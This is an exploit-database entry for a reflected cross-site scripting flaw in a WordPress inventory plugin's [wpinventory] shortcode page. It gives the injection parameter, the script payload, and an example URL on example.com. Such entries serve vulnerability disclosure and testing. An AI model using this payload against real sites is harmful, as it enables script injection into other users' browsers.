## https://sploitus.com/exploit?id=WPEX-ID:38D99C7D-2D10-4910-B95A-1CB545B813C4
On a page where the [wpinventory] shortcode is embed, append the following payload: message=<script>alert(/XSS/)</script>
For example: https://example.com/inventory?message=<script>alert(/XSS/)</script>